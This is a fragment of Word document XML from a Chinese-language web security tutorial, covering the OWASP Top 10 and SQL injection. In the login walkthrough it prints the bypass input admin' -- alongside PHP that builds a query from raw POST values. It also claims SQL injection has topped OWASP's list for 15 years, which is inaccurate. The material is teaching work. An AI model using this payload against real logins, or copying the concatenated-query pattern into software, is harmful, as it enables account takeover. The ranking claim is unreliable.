            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7846C7D8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rFonts w:cs="Times New Roman"/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防护层级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2050" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E6D98D0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网络层</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1808" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5D8C3A67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应用层</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="084FFD1B" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6A1E421E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漏洞响应速度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2050" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="25DB5E81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无法防护新漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1808" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6BC53A07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漏洞披露后数小时可防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="2C00E51A" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7FADB146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是否需要重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2050" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4576BAAC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规则更新需重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1808" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="76E43637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动态加载规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3961D982" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E21981" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>注入攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F95C6D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP TOP 10 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>核心解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065BB777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什么是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0799F912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开放</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全项目（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是国际性非营利组织，提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全标准。其发布的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TOP 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是最具威胁的十大</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全风险：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F4DACA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL/NoSQL/OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令注入）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247A5A84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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失效的身份认证（弱密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话管理缺陷）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EF3959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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感数据泄露（未加密的信用卡号</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个人信息）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6877B211" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外部实体攻击（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F732DB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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失效的访问控制（越权访问）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7066DEFC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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全配置错误（默认账户</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未修复漏洞）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35856B2C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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站脚本攻击（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6D5A1D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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不安全的反序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3026F04A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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用已知漏洞的组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DD13FB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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">0. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志记录与监控不足</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5480DE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关键点：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入连续</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年位居榜首，是最危险的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E081B6" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>网站与数据库交互原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD24BE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典型工作流程（以用户登录为例）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D77028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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户输入：在登录框输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin' --  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F66E00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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端处理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6A3B4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>&lt;PHP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232328F4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>$username = $_POST['username']; // "admin' -- "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E6D616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>$password = $_POST['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AFBB5F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>$sql = "SELECT * FROM users WHERE username='$username' AND password='$password'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3F9E3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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73865327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>&lt;SQL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0330E945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 xml:space="preserve">SELECT * FROM users </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0671B757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>WHERE username='admin' -- ' AND password='</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>任意密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53932BB8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 xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注释符，使密码验证失效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50011BA2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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库执行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558DF2B0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返回用户名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A425CD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攻击者无需密码即可登录管理员账户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514AF779" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="482"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Hlk200705932"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>核心交互组件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4404BA2B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>数据库核心交互组件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317"/>
        <w:gridCol w:w="2839"/>
        <w:gridCol w:w="3688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="177F7AED" w14:textId="77777777" w:rsidTr="00501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1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466DBF7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组件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="160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9114C1F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作用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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7A246B6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示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="3F1F16FE" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1310" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="109BA287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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3DB6D302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处理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HTTP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请求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="29C9D5E2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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Apache/Nginx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="2E0AC302" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1310" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="26C1EA96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rFonts w:cs="Times New Roman"/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应用服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="78514DF0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执行业务逻辑</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6227DB09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sz w:val="21"/>
                <w:szCs w:val="24"/>
